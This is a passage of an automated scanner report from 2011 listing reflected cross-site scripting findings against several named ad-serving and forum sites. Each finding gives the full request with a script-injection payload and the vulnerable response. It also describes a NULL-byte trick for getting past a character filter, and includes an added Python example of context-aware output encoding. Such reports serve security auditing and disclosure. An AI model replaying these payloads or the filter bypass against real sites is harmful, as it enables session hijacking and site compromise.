<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...
<script type="text/javascript">
_udn = document.domain;
_uacct = "UA-2209883-1";
if (typeof currentTab == "string") {
urchinTracker("/signup.php/81bfc";alert(1)//0b224300d3fd4d46a#" + currentTab);
} else {
urchinTracker();
}
</script>
...[SNIP]...
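The five snap.com findings above reflect input into two contexts: a double-quoted HTML attribute (4.1, 4.3, 4.4) and a double-quoted JavaScript string literal (4.2, 4.5). The added example below is not snap.com's code; the render_* functions are hypothetical stand-ins for the templates that produced the responses. It puts the raw concatenation seen in those responses next to context-specific encoding and checks both with a parser rather than by eye. The payloads are the ones from 4.1 and 4.2.

```python
"""Context-aware output encoding for reflected input: HTML attribute and JS string.
Added example; render_* are stand-ins for the server templates, payloads from the report."""
import html
import json
import re
from html.parser import HTMLParser

ATTR_PAYLOAD = '574ea"><script>alert(1)</script>46987829a31'   # finding 4.1
JS_PAYLOAD = 'f4ae7";alert(1)//631b5ca9cf4'                     # finding 4.2


def render_input_vulnerable(email):
    """Raw concatenation, as the captured response shows."""
    return f'<input class="text" type="text" name="email" value="{email}" />'


def render_input(email):
    """html.escape(quote=True) encodes the five characters that can close the
    attribute or the tag, so the value stays inside value="..."."""
    return f'<input class="text" type="text" name="email" value="{html.escape(email, quote=True)}" />'


def js_string_literal(s):
    """JSON-encode the string (escapes quotes, backslashes and, with the default
    ensure_ascii, U+2028/U+2029), then also escape < > &: the HTML parser ends a
    <script> block at '</script>' regardless of JavaScript string boundaries."""
    out = json.dumps(s)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        out = out.replace(ch, esc)
    return out


def render_tracker_vulnerable(path):
    return f'urchinTracker("{path}#" + currentTab);'


def render_tracker(path):
    # js_string_literal returns the literal complete with its surrounding quotes.
    return f'urchinTracker({js_string_literal(path + "#")} + currentTab);'


def literal_round_trips(s):
    """The hardened literal still decodes to the original string: JSON escapes
    are valid JavaScript string escapes, so the browser sees the same value."""
    return json.loads(js_string_literal(s)) == s


class _TagCollector(HTMLParser):
    """Records start tags and the attributes of the first occurrence of each."""
    def __init__(self):
        super().__init__()
        self.tags, self.attrs = [], {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.setdefault(tag, dict(attrs))


def parse_tags(markup):
    """Tags and attributes a browser-like parser sees. The attack has succeeded
    when a 'script' tag appears that the template never wrote."""
    collector = _TagCollector()
    collector.feed(markup)
    return collector.tags, collector.attrs


def unescaped_quotes(js):
    """Count double quotes not preceded by a backslash. A string literal that
    was broken out of leaves an odd count."""
    return len(re.findall(r'(?<!\\)"', js))


if __name__ == "__main__":
    print(parse_tags(render_input_vulnerable(ATTR_PAYLOAD))[0])  # ['input', 'script']
    print(parse_tags(render_input(ATTR_PAYLOAD))[0])             # ['input']
    print(unescaped_quotes(render_tracker_vulnerable(JS_PAYLOAD)),
          unescaped_quotes(render_tracker(JS_PAYLOAD)))          # 3 2
```

The point of the two checkers is that the encoding has to match the context the value lands in: attribute encoding would not help inside the urchinTracker() string, and a JSON escape would not help inside value="...". In both cases the hardened output still carries the exact payload as data, which is what the parser-based checks confirm.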

4.6. https://account.snap.com/signup.php [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.snap.com
Path:   /signup.php

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ae50"><script>alert(1)</script>0b72ea1f0e8 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /signup.php HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: https://account.snap.com/signup.php
Cache-Control: max-age=0
Origin: https://account.snap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b
Content-Length: 15403

terms=Snap+Shots+Terms+of+Use+Policy%0D%0A%0D%0APLEASE+READ+VERY+CAREFULLY+THESE+TERMS+OF+USE+FOR+THE+SNAP+SHOTS+PROGRAM%2C+INCLUDING+THE+SNAP+SHARES+FEATURES%2C+BEFORE+REGISTERING.+PARTICIPATION+IN+T
...[SNIP]...
ment+is+intended+to+be+a+beneficiary+of+this+Agreement%2C+and+no+person+not+a+party+to+this+Agreement+shall+have+any+right+to+enforce+any+term+of+this+Agreement.%0D%0A%0D%0A&accept_terms=1&email=&url=6ae50"><script>alert(1)</script>0b72ea1f0e8&password=&re-enter_password=&current_tab=setup

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 02:05:44 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...
<input class="text" type="text" name="url" maxlength="255" value="6ae50"><script>alert(1)</script>0b72ea1f0e8" />
...[SNIP]...

4.7. http://ads.adxpose.com/ads/ads.js [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload c52ae<script>alert(1)</script>e41adc6af97 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_289667c52ae<script>alert(1)</script>e41adc6af97 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=527F87460647F92F1D5DF43DA9C49229; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 14:21:11 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,j,"",Math.round(Y.left)+","+Math.round(Y.top),O+","+I,C,l,m,v,S,c)}}t=p.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_289667c52ae<script>alert(1)</script>e41adc6af97".replace(/[^\w\d]/g,""),"ZC45X9Axu6NOUFfX_289667c52ae<script>
...[SNIP]...

4.8. http://adserving.cpxinteractive.com/st [ad_size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 353f1'-alert(1)-'63a73adbc30 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=ad&ad_size=728x90353f1'-alert(1)-'63a73adbc30&section=1712152 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nuclearpesticide.com/?epl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 13:46:35 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 26 Apr 2011 13:46:35 GMT
Content-Length: 616

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=728x90353f1'-alert(1)-'63a73adbc30&inv_code=1712152&referrer=http://www.nuclearpesticide.com/%3Fepl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5
...[SNIP]...

4.9. http://adserving.cpxinteractive.com/st [section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 939d5'-alert(1)-'00990139a3b was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=ad&ad_size=728x90&section=1712152939d5'-alert(1)-'00990139a3b HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nuclearpesticide.com/?epl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 13:46:39 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 26 Apr 2011 13:46:39 GMT
Content-Length: 616

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=728x90&inv_code=1712152939d5'-alert(1)-'00990139a3b&referrer=http://www.nuclearpesticide.com/%3Fepl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U
...[SNIP]...

4.10. http://afreshbunch.com/files/com/call.asp [instance_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /files/com/call.asp

Issue detail

The value of the instance_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c50b0"><script>alert(1)</script>1231ca00dba was submitted in the instance_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /files/com/call.asp?page=stats&instance_id=CB37911B-6349-45F9-8E60-626BA164D748c50b0"><script>alert(1)</script>1231ca00dba&site_id=453756&muid=NOMEMBER&lastpage=%2Fforums%2Fdefault%2Easp%3Fpage%3Dpost%26id%3DA1068400%2D5C67%2D4276%2DA448%2D8E648C68CF74%26fid%3D1E97BB3C%2D73BC%2D40AF%2D9065%2DB0C5EBC2FF2E%26lastp%3D1%26cachecommand%3Dbypass&loadtime=0.19 HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://afreshbunch.com/forums/?page=post&id=A1068400-5C67-4276-A448-8E648C68CF74&fid=1E97BB3C-73BC-40AF-9065-B0C5EBC2FF2E&lastp=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.7.10.1303778640

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 1488
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:10:10 GMT


<html>
<head>
<title></title>
<link rel="stylesheet" type="text/css" href="../../system/error.css" />
</head>
<body>
3
<script>
function checkcomment(objValue)
{

if(eva
...[SNIP]...
<input type="hidden" name="page" value="http://afreshbunch.com//files/com/call.asp?page=stats&instance_id=CB37911B-6349-45F9-8E60-626BA164D748c50b0"><script>alert(1)</script>1231ca00dba&site_id=453756&muid=NOMEMBER&lastpage=%2Fforums%2Fdefault%2Easp%3Fpage%3Dpost%26id%3DA1068400%2D5C67%2D4276%2">
...[SNIP]...

4.11. http://afreshbunch.com/files/com/call.asp [lastpage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /files/com/call.asp

Issue detail

The value of the lastpage request parameter is copied into the HTML document as plain text between tags. The payload c8b61<script>alert(1)</script>2cde569026c was submitted in the lastpage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /files/com/call.asp?page=stats&instance_id=CB37911B-6349-45F9-8E60-626BA164D748&site_id=453756&muid=NOMEMBER&lastpage=%2Fforums%2Fdefault%2Easp%3Fpage%3Dpost%26id%3DA1068400%2D5C67%2D4276%2DA448%2D8E648C68CF74%26fid%3D1E97BB3C%2D73BC%2D40AF%2D9065%2DB0C5EBC2FF2E%26lastp%3D1%26cachecommand%3Dbypassc8b61<script>alert(1)</script>2cde569026c&loadtime=0.19 HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://afreshbunch.com/forums/?page=post&id=A1068400-5C67-4276-A448-8E648C68CF74&fid=1E97BB3C-73BC-40AF-9065-B0C5EBC2FF2E&lastp=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.7.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 305
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSQABRTT=HANPHPADFHDBFMACNLNHMNBO; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:27:08 GMT


//document.write("<textarea></textarea>")
//document.write("<br><textarea>/forums/default.asp?page=post&id=A1068400-5C67-4276-A448-8E648C68CF74&fid=1E97BB3C-73BC-40AF-9065-B0C5EBC2FF2E&lastp=1&cachecommand=bypassc8b61<script>alert(1)</script>2cde569026c</textarea>
...[SNIP]...

4.12. http://afreshbunch.com/forums/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /forums/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 940ab"><script>alert(1)</script>1bee2ef731a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forums/?page=t&sa=recent&d=3&940ab"><script>alert(1)</script>1bee2ef731a=1 HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://afreshbunch.com/forums/?page=post&id=A1068400-5C67-4276-A448-8E648C68CF74&fid=1E97BB3C-73BC-40AF-9065-B0C5EBC2FF2E&lastp=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.9.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 17140
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:33:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSQABRTT=KODBIPADLLFMGKOOHICPDFJI; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:34:28 GMT


<!DOCTYPE html>
<html>

<head>
<LINK REL="SHORTCUT ICON" HREF="/user/453756/theme/favicon.ico">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<meta na
...[SNIP]...
<a href="/forums/?sa=mine&page=t&d=3&940ab"><script>alert(1)</script>1bee2ef731a=1&cachecommand=bypass">
...[SNIP]...

4.13. http://afreshbunch.com/forums/ [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /forums/

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003bd70"><script>alert(1)</script>a70dc90eb4a was submitted in the page parameter. This input was echoed as 3bd70"><script>alert(1)</script>a70dc90eb4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /forums/?page=t%003bd70"><script>alert(1)</script>a70dc90eb4a&sa=recent&d=3 HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://afreshbunch.com/forums/?page=post&id=A1068400-5C67-4276-A448-8E648C68CF74&fid=1E97BB3C-73BC-40AF-9065-B0C5EBC2FF2E&lastp=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.9.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 17138
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:09:26 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:10:26 GMT


<!DOCTYPE html>
<html>

<head>
<LINK REL="SHORTCUT ICON" HREF="/user/453756/theme/favicon.ico">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<meta na
...[SNIP]...
<a href="/forums/?sa=mine&page=t%003bd70"><script>alert(1)</script>a70dc90eb4a&d=3&cachecommand=bypass">
...[SNIP]...

4.14. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 24105<script>alert(1)</script>d1dfb28578f was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction24105<script>alert(1)</script>d1dfb28578f&n=ar_int_p97174789&1303827696143 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303827675%2E212%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 14:21:27 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction24105<script>alert(1)</script>d1dfb28578f("");

4.15. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ncu parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the ncu request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b413'><script>alert(1)</script>4a29843458a was submitted in the ncu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2423626&PluID=0&w=300&h=250&ord=20110426142246&ifrm=2&ncu=http%3A%2F%2Fspamlaws.us.intellitxt.com%2Fal.asp%3Fts%3D20110426142113%26at%3D39%26ipid%3D10143%26di%3D31742909%26syid%3D0%26adid%3D0%26pid%3D2%26cc%3Dus%26rcc%3Dus%26mh%3Db5e073b8ec12fc1181fc2fd3b1a46a79%26ll%3D0%26hbll%3D0%26id%3DFCBEC610ABA64BC3BAF092D3EB42D7C0%26idh%3De18a41658ec9c9c740dc1b91edbc4646%26pvu%3D59196390591647FA9372FACB8C10DBA5%26pvm%3D35e167e1c66fee62be98fe397190a726%26uf%3D0%26ur%3D0%26llip%3D0%26ttv%3D1%26redir%3D1b413'><script>alert(1)</script>4a29843458a HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
